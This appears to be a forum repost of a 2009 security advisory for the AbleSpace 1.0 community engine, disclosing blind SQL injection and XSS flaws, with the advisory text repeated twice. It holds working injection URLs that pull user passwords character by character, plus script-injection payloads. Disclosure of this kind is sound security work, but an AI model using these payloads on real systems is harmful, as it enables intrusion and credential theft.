Corwin
15.04.2009, 07:55
Application: AbleSpace
Versions Affected: 1.0
Vendor URL: http://abk-soft.com/
Bugs: Multiple Blind SQL Injections, Multiple XSS
Exploits: YES
Reported: 18.03.2009
Vendor Response: NONE
Secondly Reported: 29.03.2009
Solution: NONE
Date of Public Advisory: 14.04.2009
Author: Eugene "Corwin" Ermakov
Digital Security Research Group [DSecRG]
Details
*******
1. Multiple Blind Sql Injections
1.1 Attacker can inject SQL code in events_view.php vulnerable parametr eid
Example:
http://[server]/[installdir]/events_view.php?eid=69'
1.2 Attacker can inject SQL code in events_clndr_view.php vulnerable parametr id
Example:
http://[server]/[installdir]/events_clndr_view.php?id=1 and substring(@@version,1,1)=4
http://[server]/[installdir]/events_clndr_view.php?id=1 and ascii(substring((select password from user where name='Mike'),1,1)) between 97 and 103
http://[server]/[installdir]/events_clndr_view.php?id=1 and ascii(substring((select concat_ws(0x3a,name,password) from user where name='Mike'),1,1)) =77
http://[server]/[installdir]/events_clndr_view.php?id=1 and ascii(substring((select concat_ws(0x3a,name,password) from user where user_id=1),1,1)) between 1 and 200
2. Stored XSS
2.1 Vulnerability found in script blogs_full.php
Example:
<IMG SRC=javascript:alert('XSS')>
3. Multiple Linked XSS
3.1 Linked XSS vulnerabiliies found in groups_profile.php. GET parameter "gid"
Example:
http://[server]/[installdir]/groups_profile.php?gid=311"><script>alert()</script>
3.2 Linked XSS vulnerabiliies found in adv_cat.php. GET parameter "cat_id", "razd_id"
Example:
http://[server]/[installdir]/adv_cat.php?cat_id=4"><script>alert()</script>&razd_id=45"><script>alert()</script>
Able - движек для создания коммунити с кучей примочек.
MIXER - практически идентичный AbleSpace движек, но продаваемый как самостоятельная CMS, баги теже самые.
писали вендору несколько раз без ответно.
Versions Affected: 1.0
Vendor URL: http://abk-soft.com/
Bugs: Multiple Blind SQL Injections, Multiple XSS
Exploits: YES
Reported: 18.03.2009
Vendor Response: NONE
Secondly Reported: 29.03.2009
Solution: NONE
Date of Public Advisory: 14.04.2009
Author: Eugene "Corwin" Ermakov
Digital Security Research Group [DSecRG]
Details
*******
1. Multiple Blind Sql Injections
1.1 Attacker can inject SQL code in events_view.php vulnerable parametr eid
Example:
http://[server]/[installdir]/events_view.php?eid=69'
1.2 Attacker can inject SQL code in events_clndr_view.php vulnerable parametr id
Example:
http://[server]/[installdir]/events_clndr_view.php?id=1 and substring(@@version,1,1)=4
http://[server]/[installdir]/events_clndr_view.php?id=1 and ascii(substring((select password from user where name='Mike'),1,1)) between 97 and 103
http://[server]/[installdir]/events_clndr_view.php?id=1 and ascii(substring((select concat_ws(0x3a,name,password) from user where name='Mike'),1,1)) =77
http://[server]/[installdir]/events_clndr_view.php?id=1 and ascii(substring((select concat_ws(0x3a,name,password) from user where user_id=1),1,1)) between 1 and 200
2. Stored XSS
2.1 Vulnerability found in script blogs_full.php
Example:
<IMG SRC=javascript:alert('XSS')>
3. Multiple Linked XSS
3.1 Linked XSS vulnerabiliies found in groups_profile.php. GET parameter "gid"
Example:
http://[server]/[installdir]/groups_profile.php?gid=311"><script>alert()</script>
3.2 Linked XSS vulnerabiliies found in adv_cat.php. GET parameter "cat_id", "razd_id"
Example:
http://[server]/[installdir]/adv_cat.php?cat_id=4"><script>alert()</script>&razd_id=45"><script>alert()</script>
Able - движек для создания коммунити с кучей примочек.
MIXER - практически идентичный AbleSpace движек, но продаваемый как самостоятельная CMS, баги теже самые.
писали вендору несколько раз без ответно.